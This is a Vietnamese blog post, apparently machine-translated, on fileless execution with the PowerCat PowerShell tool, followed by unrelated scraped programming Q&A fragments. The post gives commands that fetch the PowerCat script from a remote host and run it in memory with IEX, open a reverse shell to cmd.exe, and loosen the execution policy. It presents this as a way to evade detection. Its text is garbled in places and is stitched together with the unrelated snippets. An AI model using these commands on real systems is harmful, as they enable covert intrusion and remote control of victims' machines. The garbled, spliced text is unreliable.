57
4
Tuyên bố miễn trừ trách nhiệm: Bài viết này chủ yếu được sử dụng để chia sẻ kỹ thuật và tất cả nội dung chỉ mang tính chất tham khảo. Tôi không chịu trách nhiệm về bất kỳ hậu quả pháp lý nào do việc sử dụng hoặc dựa vào thông tin trong bài viết này gây ra. Người đọc nên tự đánh giá rủi ro và tuân thủ các luật và quy định có liên quan.
Thực thi không dùng tệp là một kỹ thuật được sử dụng để tránh để lại dấu vết tệp trên đĩa, khiến hành vi độc hại khó bị phát hiện hơn. PowerCat là một công cụ kiểm tra thâm nhập dựa trên PowerShell có thể sử dụng các tính năng của PowerShell để đạt được khả năng thực thi không dùng tệp.
Chuẩn bị tập lệnh PowerCat: Lưu trữ tập lệnh PowerCat trên máy chủ từ xa có thể truy cập, chẳng hạn như GitHub Gist, Pastebin hoặc máy chủ HTTP tự xây dựng.
Tải xuống và thực thi tập lệnh trực tiếp từ máy chủ từ xa bằng lệnh PowerShell:
Trung tâm cá nhân
Điều chỉnh hành động
bỏIEX(Gọi-Biểu thức) và Gọi-WebRequest hoặc Phương thức gọi-nghỉ ngơi Sự kết hợp có thể tải và thực thi các tập lệnh trực tiếp trong bộ nhớ.IEX (New-Object Net.WebClient).DownloadString('https://example.com/path/to/powercat.ps1')
Hoặc sử dụng Invoke-RestMethod:
IEX (Invoke-RestMethod -Uri 'https://example.com/path/to/powercat.ps1')
powercat -c target_ip -p target_port -e cmd.exe
Giả sử tập lệnh PowerCat được lưu trữ tại https://example.com/path/to/powercat.ps1:
IEX (New-Object Net.WebClient).DownloadString('https://example.com/path/to/powercat.ps1'); powercat -c target_ip -p target_port -e cmd.exe
Lệnh này tải xuống và thực thi tập lệnh PowerCat trong bộ nhớ và ngay lập tức thiết lập kết nối shell ngược thông qua PowerCat.
Bảo mật: Đảm bảo rằng máy chủ từ xa lưu trữ tập lệnh được an toàn để ngăn chặn việc giả mạo tập lệnh.
Quyền: Chính sách thực thi PowerShell có thể hạn chế việc thực thi tập lệnh. Bạn cần chạy PowerShell với quyền quản trị viên hoặc điều chỉnh chính sách thực thi:
Quy trình phạm vi không giới hạn Set-ExecutionPolicy
Thông qua các bước này, bạn có thể triển khai thực thi PowerCat không dùng tệp và trực tiếp tải xuống và thực thi các tập lệnh PowerCat trong bộ nhớ.
Máy từ xa khởi động dịch vụ web để bên được kiểm soát tải xuống tập lệnh powercat.
Máy bay tấn công bật giám sát.
Thực hiện lệnh.
Kết thúc cuộc tấn công đã được nhận thành công.
Kiểm tra danh sách các tệp trong thư mục thực thi của thiết bị đầu cuối được điều khiển. Không có tệp powercat.ps1, có nghĩa là tệp không được thực thi trên mặt đất và được thực thi trực tiếp trong bộ nhớ.
Tất nhiên, ngoài việc sử dụng IEX để triển khai không dùng tệp, còn có 4 phương pháp khác có thể được sử dụng. Chào mừng bạn theo dõi tài khoản công khai "D1TASec" để xem bài viết.
Cuối cùng, bài viết này nói về kỹ năng thực thi không dùng tệp Powercat. Bạn có chắc chắn không muốn vào xem thử không? Bài viết này chỉ vậy thôi. Nếu bạn muốn biết thêm về các kỹ thuật triển khai không dùng tệp của Powercat, bạn có chắc chắn không muốn vào xem không? Về nội dung, vui lòng tìm kiếm các bài viết của CFSDN hoặc tiếp tục duyệt các bài viết liên quan. Tôi hy vọng bạn sẽ ủng hộ blog của tôi trong tương lai! .
57
4
0
#include int main () { char name[20]; printf("Vui lòng nhập tên của bạn: ");
Tôi có một đối tượng Regex được tạo bằng cách sử dụng hàm tạo Regex(string Pattern) mới, có cách nào để sau này xem mẫu đã tạo đối tượng Regex không? Tôi dường như không thể truy cập Regex hoặc RegexOpt
Tôi đang bắt đầu bằng C và tôi phải kiểm tra xem đối số của hàm chính có gấp đôi không. Tôi đang cố gắng sử dụng strtod nhưng nó gây ra một số rắc rối. Vì vậy, phần chính của tôi trông như thế này: int main (int argc,
Giả sử tôi có: Làm cách nào để kiểm tra xem $('.outer') có div chứa lớp có tên là "bar" không? Câu trả lời hay nhất sử dụng bộ chọn :has. $('.outer:has(.bar)') jsFiddle .
Hãy dành một chút thời gian để xem fiddle này. Ở đây, Container1 và Container2 có màu nền: #ccc và h1, còn div .logo có lề. Lề trái và phải hoạt động tốt. Tại sao chọn lề trên
Hãy thử điều này: template class Base { public: int someBaseMember;
Sau khi tôi tìm nạp dữ liệu từ xa (git-fetch), git đủ tốt để cho tôi biết SHA, old..new trên mỗi nhánh, nhưng nếu tôi làm việc nhiều trên bảng điều khiển, tôi có thể mất chúng. Làm thế nào tôi có thể hiển thị lại chúng? Tất nhiên tôi có thể lưu đầu ra
Tôi đã xây dựng một trang web với menu ngang trên nền tảng WordPress. Có vẻ ổn khi xem trong tức là 9+ và firefox, nhưng trên ie8- các lớp css trong menu có vẻ không chính xác. Tôi đang cố gắng sử dụng firebug
Có thể xem loại lớp này thực hiện là gì không? Đại loại như thế này: >:typeclasses Int [Num, etc...] Câu trả lời hay nhất là sử dụng lệnh :info. Khúc dạo đầu> :thông tin Dữ liệu Int Trong
Tôi đang sử dụng chức năng Windows CreateToolhelp32snapshot để liệt kê các tiến trình đang chạy trên máy của mình. Trường pe32.szeFileName mà nó trả về là WCHAR, là tên của tệp thực thi. tôi muốn
Tôi đã viết một hàm nhận một số tham số và bên trong hàm tôi sử dụng một lớp có hàm từ thư viện bên thứ ba trả về một lời hứa và tôi trả về kết quả của lời hứa đó trong hàm của chính mình. Thích: trả lại clie
Trong R, người ta có thể chỉ định một công thức: F <- as.formula('X ~ 1') Tôi đang cố gắng tìm ra cách để kiểm tra xem F ở trên chỉ chứa phần chặn hay không, tức là ~1. Tôi đã thử sử dụng grpl nhưng không có kết quả. Có cách nào để xác định những điều trên
Tôi là một lập trình viên xuất sắc, rất xuất sắc!